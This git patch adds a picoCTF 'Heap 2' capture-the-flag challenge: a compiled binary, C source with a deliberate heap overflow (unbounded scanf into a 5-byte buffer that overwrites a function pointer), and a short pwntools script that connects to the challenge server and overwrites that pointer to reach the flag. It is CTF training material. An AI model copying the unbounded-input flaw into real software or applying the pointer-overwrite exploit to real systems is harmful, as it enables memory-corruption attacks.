From 4434a103bd65cc139513986860403f423ebf7a80 Mon Sep 17 00:00:00 2001
From: Maxime Vorwerk <Maxime Vorwerk>
Date: Sat, 15 Jun 2024 14:58:30 +0200
Subject: [PATCH] Heap 2

---
 heap_2/chall   | Bin 0 -> 20416 bytes
 heap_2/chall.c |  92 +++++++++++++++++++++++++++++++++++++++++++++++++
 heap_2/sol.py  |  15 ++++++++
 3 files changed, 107 insertions(+)
 create mode 100755 heap_2/chall
 create mode 100755 heap_2/chall.c
 create mode 100755 heap_2/sol.py

diff --git a/heap_2/chall b/heap_2/chall
new file mode 100755
index 0000000000000000000000000000000000000000..f8f6289f332fdcc8b49fc1c7b4dd3cd8f1f1247d
GIT binary patch
literal 20416
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

literal 0
HcmV?d00001

diff --git a/heap_2/chall.c b/heap_2/chall.c
new file mode 100755
index 0000000..57ca422
--- /dev/null
+++ b/heap_2/chall.c
@@ -0,0 +1,92 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#define FLAGSIZE_MAX 64
+
+int num_allocs;
+char *x;
+char *input_data;
+
+void win() {
+    // Print flag
+    char buf[FLAGSIZE_MAX];
+    FILE *fd = fopen("flag.txt", "r");
+    fgets(buf, FLAGSIZE_MAX, fd);
+    printf("%s\n", buf);
+    fflush(stdout);
+
+    exit(0);
+}
+
+void check_win() { ((void (*)())*(int*)x)(); }
+
+void print_menu() {
+    printf("\n1. Print Heap\n2. Write to buffer\n3. Print x\n4. Print Flag\n5. "
+           "Exit\n\nEnter your choice: ");
+    fflush(stdout);
+}
+
+void init() {
+
+    printf("\nI have a function, I sometimes like to call it, maybe you should change it\n");
+    fflush(stdout);
+
+    input_data = malloc(5);
+    strncpy(input_data, "pico", 5);
+    x = malloc(5);
+    strncpy(x, "bico", 5);
+}
+
+void write_buffer() {
+    printf("Data for buffer: ");
+    fflush(stdout);
+    scanf("%s", input_data);
+}
+
+void print_heap() {
+    printf("[*]   Address   ->   Value   \n");
+    printf("+-------------+-----------+\n");
+    printf("[*]   %p  ->   %s\n", input_data, input_data);
+    printf("+-------------+-----------+\n");
+    printf("[*]   %p  ->   %s\n", x, x);
+    fflush(stdout);
+}
+
+int main(void) {
+
+    // Setup
+    init();
+
+    int choice;
+
+    while (1) {
+        print_menu();
+	if (scanf("%d", &choice) != 1) exit(0);
+
+        switch (choice) {
+        case 1:
+            // print heap
+            print_heap();
+            break;
+        case 2:
+            write_buffer();
+            break;
+        case 3:
+            // print x
+            printf("\n\nx = %s\n\n", x);
+            fflush(stdout);
+            break;
+        case 4:
+            // Check for win condition
+            check_win();
+            break;
+        case 5:
+            // exit
+            return 0;
+        default:
+            printf("Invalid choice\n");
+            fflush(stdout);
+        }
+    }
+}
diff --git a/heap_2/sol.py b/heap_2/sol.py
new file mode 100755
index 0000000..27ecbce
--- /dev/null
+++ b/heap_2/sol.py
@@ -0,0 +1,15 @@
+#!/home/maxime/.pyvenv/bin/python3
+from pwn import *
+
+conn = connect("mimas.picoctf.net", 51447)
+
+conn.recvuntil(b':')
+
+conn.sendline(b'2')
+
+conn.recvuntil(b':')
+
+conn.sendline(b'0' * 32 + b'\xa0\x11\x40')
+
+conn.interactive()
+